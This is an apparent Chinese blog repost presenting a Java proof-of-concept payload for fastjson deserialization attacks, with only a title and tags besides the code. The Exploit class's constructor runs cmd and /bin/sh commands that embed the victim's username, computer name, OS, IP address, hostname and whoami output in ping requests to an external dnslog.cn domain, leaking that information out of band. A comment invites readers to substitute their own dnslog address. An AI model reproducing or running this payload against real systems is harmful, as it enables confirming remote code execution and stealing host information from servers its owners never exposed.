fastjson ping外带信息poc
作者:互联网
public class Exploit {
public Exploit(){
String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址
String win_dnslog = "windows" + base_url;
// windows
try{
String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
try{
String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
try{
String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
// linux
String linux_dnslog = "linux" + base_url;
try{
String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
try{
String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
try{
String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
try{
String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
Runtime.getRuntime().exec(commands);
}catch(Exception e){
// e.printStackTrace();
}
}
public static void main(String[] args){
Exploit e = new Exploit();
}
}标签:fastjson,commands,dnslog,String,ping,printStackTrace,linux,poc 来源: https://www.cnblogs.com/huim/p/12000884.html